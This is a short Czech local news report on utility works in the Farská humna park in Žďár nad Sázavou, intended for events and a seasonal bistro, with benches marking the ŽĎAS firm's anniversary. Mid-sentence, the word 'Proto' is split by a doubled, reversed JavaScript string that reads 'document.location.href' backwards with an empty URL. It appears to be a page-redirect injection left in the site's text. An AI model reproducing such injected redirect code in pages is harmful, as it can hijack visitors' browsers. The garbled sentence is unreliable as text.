Rainbow page separator

Výkopy v parku skryjí kabely potřebné pro akce i provoz bistra

Pátek, 23. července 2021

Žďár nad Sázavou / Nejpozději do 6. srpna mají být dokončeny stavební práce v parku Farská humna, kde žďárská radnice zahájila budování inženýrských sítí potřebných pro různé kulturní a společenské akce a rovněž pro sezonní bistro, které bude ve Farských humnech zprovozněno a jehož realizaci zpozdila nejistá situace spojená s různými vládními epidemiologickými restrikcemi. Pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to má být otevřeno nejdříve zkušebně, s plným provozem je předběžně počítáno až v příštím roce. Aktuální výstavba technické infrastruktury vyjde na 672 tisíc korun včetně DPH.
V parku přibudou také lavičky, které mají být jednak unikátním dílem, ale rovněž připomínkou sedmdesátého výročí založení žďárské strojírenské firmy ŽĎAS. Oslavy jubilea se uskuteční v sobotu 28. srpna, přičemž odpolední a večerní část veřejnosti volně přístupného programu Dne ŽĎASU je naplánovaná právě ve Farských humnech.